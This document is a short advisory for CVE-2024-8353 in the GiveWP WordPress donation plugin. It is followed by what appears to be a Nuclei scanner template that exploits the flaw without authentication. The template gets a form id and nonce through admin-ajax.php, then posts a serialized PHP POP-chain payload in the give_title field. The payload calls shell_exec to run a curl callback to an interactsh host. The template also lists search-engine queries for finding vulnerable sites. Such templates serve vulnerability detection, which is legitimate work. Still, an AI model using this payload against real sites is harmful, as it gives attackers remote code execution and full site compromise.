The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.1. This is due to insufficient input validation on user-supplied data. An unauthenticated attacker can inject a serialized PHP object, which may allow them to execute arbitrary PHP code, depending on the presence of a suitable POP chain on the target system. This vulnerability could lead to full site compromise.
PoC代码[已公开]
id: CVE-2024-8353
info:
name: GiveWP Donation Plugin <= 3.16.1 - Unauthenticated PHP Object Injection
author: hnd3884
severity: critical
description: |
The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.1. This is due to insufficient input validation on user-supplied data. An unauthenticated attacker can inject a serialized PHP object, which may allow them to execute arbitrary PHP code, depending on the presence of a suitable POP chain on the target system. This vulnerability could lead to full site compromise.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-8353
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give/givewp-donation-plugin-and-fundraising-platform-3161-unauthenticated-php-object-injection
- https://plugins.trac.wordpress.org/browser/give/trunk/readme.txt
- https://plugins.trac.wordpress.org/browser/give/tags/3.16.0/includes/process-donation.php#L154
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-8353
cwe-id: CWE-502
epss-score: 0.92258
epss-percentile: 0.99708
cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
vendor: givewp
product: givewp
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/give/"
fofa-query: body="/wp-content/plugins/give/"
publicwww-query: "/wp-content/plugins/give/"
tags: cve,cve2024,wordpress,wp,wp-plugin,givewp,rce,unauth,vkev
variables:
cmd: "curl+http://test.{{interactsh-url}}"
length: "{{len(cmd)}}"
cred: "{{rand_text_alpha(8)}}"
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=give_form_search
extractors:
- type: json
name: id
json:
- ".[0].id"
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=give_donation_form_nonce&give_form_id={{id}}
extractors:
- type: json
name: nonce
json:
- ".data"
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
give-form-id={{id}}&give-form-hash={{nonce}}&give-price-id=0&give-amount=10&give_first={{cred}}&give_last={{cred}}&give_email={{cred}}%40example.org&give_title=%5CO%3A19%3A%22Stripe%5C%5C%5C%5CStripeObject%22%3A1%3A%7Bs%3A10%3A%22%5C0%2A%5C0_values%22%3Ba%3A1%3A%7Bs%3A3%3A%22foo%22%3BO%3A62%3A%22Give%5C%5C%5C%5CPaymentGateways%5C%5C%5C%5CDataTransferObjects%5C%5C%5C%5CGiveInsertPaymentData%22%3A1%3A%7Bs%3A8%3A%22userInfo%22%3Ba%3A1%3A%7Bs%3A7%3A%22address%22%3BO%3A4%3A%22Give%22%3A1%3A%7Bs%3A12%3A%22%5C0%2A%5C0container%22%3BO%3A33%3A%22Give%5C%5C%5C%5CVendors%5C%5C%5C%5CFaker%5C%5C%5C%5CValidGenerator%22%3A3%3A%7Bs%3A12%3A%22%5C0%2A%5C0validator%22%3Bs%3A10%3A%22shell_exec%22%3Bs%3A12%3A%22%5C0%2A%5C0generator%22%3BO%3A34%3A%22Give%5C%5C%5C%5COnboarding%5C%5C%5C%5CSettingsRepository%22%3A1%3A%7Bs%3A11%3A%22%5C0%2A%5C0settings%22%3Ba%3A1%3A%7Bs%3A8%3A%22address1%22%3Bs%3A{{length}}%3A%22{{cmd}}%22%3B%7D%7Ds%3A13%3A%22%5C0%2A%5C0maxRetries%22%3Bi%3A10%3B%7D%7D%7D%7D%7D%7D&give-gateway=offline&action=give_process_donation
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, 'dns')
- contains(content_type, "text/html")
- status_code == 500
condition: and
# digest: 490a0046304402207f4e096397d206ff98c5b0f42640ad4cd4fee867fb0aa768c69c0cb265dca55202203362d4800065dcd09b5272cb52b64e8812aff6f70fbb317302f6a62adc862bd5:922c64590222798bb761d5b6d8e72950